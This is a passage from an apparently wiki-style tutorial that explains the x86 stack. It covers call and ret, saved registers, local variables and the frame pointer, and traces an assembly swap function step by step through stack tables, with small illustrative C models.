<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
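The behaviour of call and ret can also be written out as a small C model. The ToyCpu type and the two helpers below are assumptions made up for this sketch; a real processor does this in hardware, and the stack here is just an eight-word array indexed by esp.<br />

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t mem[8];  /* stack memory, one slot per 32-bit word */
    int esp;          /* index of the top of stack; grows toward 0 */
    uint32_t eip;     /* address of the next instruction to run */
} ToyCpu;

/* call: push the address of the following instruction, then jump. */
void toy_call(ToyCpu *cpu, uint32_t next_instruction, uint32_t target)
{
    assert(cpu->esp > 0);
    cpu->esp -= 1;
    cpu->mem[cpu->esp] = next_instruction;
    cpu->eip = target;
}

/* ret: pop the saved address off the stack and jump to it. */
void toy_ret(ToyCpu *cpu)
{
    assert(cpu->esp < 8);
    cpu->eip = cpu->mem[cpu->esp];
    cpu->esp += 1;
}
```

Using the addresses from the example, toy_call(&cpu, 0x10000007, 0x10000020) followed by toy_ret(&cpu) leaves eip at 0x10000007 and esp where it was before the call.<br />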
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. That means a function that uses them has to save their values and restore them before returning, so the caller sees them unchanged. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
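The same save and restore pattern can be modelled in C. This is a sketch only: ToyRegs, push32, pop32, and toy_test are hypothetical names, and the two constants written into the registers simply stand in for whatever work the function body does.<br />

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t esi, edi;
    uint32_t stack[4];
    int esp;            /* index of the top of stack; grows toward 0 */
} ToyRegs;

static void push32(ToyRegs *r, uint32_t v)
{
    assert(r->esp > 0);
    r->stack[--r->esp] = v;
}

static uint32_t pop32(ToyRegs *r)
{
    assert(r->esp < 4);
    return r->stack[r->esp++];
}

/* Mirrors test(): save esi and edi, clobber them, restore in reverse order. */
void toy_test(ToyRegs *r)
{
    push32(r, r->esi);
    push32(r, r->edi);
    r->esi = 0xdeadbeef;   /* the function body is free to use both */
    r->edi = 0xcafebabe;
    r->edi = pop32(r);     /* last pushed, first popped */
    r->esi = pop32(r);
}
```

Popping in the same order as the pushes would hand esi the value that belonged to edi and vice versa, which is why the order is reversed.<br />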
<br />
== Local Variables ==<br />
<br />
At the beginning of most functions, space is allocated for local variables. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them relative to the stack pointer or the frame pointer. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece of the puzzle. Unless a program has been optimized, ebp is set to point at the slot just above the local variables (the saved copy of the caller's ebp). The reason for this is that throughout a function, the stack pointer changes (due to saving registers, making function calls, and other reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it never changes during the function. <br />
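A quick calculation shows why ebp is the more convenient base. In the sketch below, offset_from is a made-up helper and the addresses are arbitrary sample values; it assumes 32-bit addresses.<br />

```c
#include <assert.h>
#include <stdint.h>

/* Signed offset of a fixed stack slot relative to a base register value. */
int32_t offset_from(uint32_t slot, uint32_t base)
{
    return (int32_t)(slot - base);
}
```

Take ebp = 0x1000 and a local at 0x0ffc. Right after sub esp, 8 the stack pointer is 0x0ff8, so the local is at esp + 4. One more push moves esp to 0x0ff4 and the same local is now at esp + 8, while its offset from ebp stays at -4 the whole time.<br />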
<br />
Here is an example of a swap function that uses two parameters passed on the stack and two local variables to store the interim values. If you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been simplified; in reality, each address would increase by the size of the previous instruction.<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Clear the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference the first pointer to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference the second pointer to get the second value.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [ecx], esi ; Put the second value into the first address.<br />
0x40100e mov [edx], edi ; Put the first value into the second address.<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
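If C is easier for you to read, the swap function is meant to behave roughly like the sketch below. This is a reconstruction for comparison rather than the downloadable source, and the names first and second are invented here to stand for the two locals at ebp-4 and ebp-8.<br />

```c
/* Hypothetical C equivalent of the assembly swap routine.
   `first` and `second` are illustrative names for the two
   local variables stored at [ebp-4] and [ebp-8]. */
void swap(int *a, int *b)
{
    int first = *a;    /* dereference the first pointer, keep the value in a local */
    int second = *b;   /* dereference the second pointer, keep the value in a local */

    *a = second;       /* put the second value into the first address */
    *b = first;        /* put the first value into the second address */
}
```

A caller would pass the addresses of two integers, for example swap(&x, &y), which matches the two pointers pushed before the call instruction.<br />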
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how in the following section the variables are addressed relative to ebp. The first parameter is at ebp + 8, which is 2 values above ebp on the stack, and the second is at ebp + 12, which is 3 above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference the pointer to get the first parameter.<br />
0x401008 mov edi, [edx] ; Dereference the pointer to get the second parameter.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
0x40100d mov [ecx], esi ; Put the second value into the first address.<br />
0x40100e mov [edx], edi ; Put the first value into the second address.<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
0x400003 add esp, 8 ; Clear the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
Every function should leave the stack pointer in the exact place it received it. In other words, every amount subtracted from the stack pointer (either by sub or push) ''has to be added back to it'' (either by add or pop). If it isn't, the return address won't be in the right place when ret executes, and the program will likely crash.<br />
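To make the bookkeeping concrete, here is a toy model of the stack in C that replays the pushes, pops, sub and add from the swap function and reports whether they cancel out. Everything in it (ToyStack, toy_push, toy_pop, swap_frame_imbalance, and the placeholder values) is made up for illustration; it only counts 4-byte slots and is not how a real CPU or debugger tracks the stack.<br />

```c
#include <stdint.h>

/* Toy model of the x86 stack; all names here are invented for illustration. */
enum { STACK_WORDS = 64 };

typedef struct {
    uint32_t mem[STACK_WORDS]; /* one slot per 4-byte stack word */
    int sp;                    /* index of the current top slot (plays the role of esp) */
} ToyStack;

static void toy_init(ToyStack *s) { s->sp = STACK_WORDS; }

/* push: move the stack pointer down one slot, then store the value */
static void toy_push(ToyStack *s, uint32_t v) { s->mem[--s->sp] = v; }

/* pop: load the value, then move the stack pointer back up one slot */
static uint32_t toy_pop(ToyStack *s) { return s->mem[s->sp++]; }

/* Replays the stack operations of the swap function body and returns how
   far the stack pointer ended up from where it started (0 means balanced). */
int swap_frame_imbalance(void)
{
    ToyStack s;
    toy_init(&s);
    int entry_sp = s.sp;

    toy_push(&s, 0xEB9u);  /* push ebp   (placeholder value) */
    s.sp -= 2;             /* sub esp, 8 (two 4-byte locals)  */
    toy_push(&s, 0x51u);   /* push esi   (placeholder value) */
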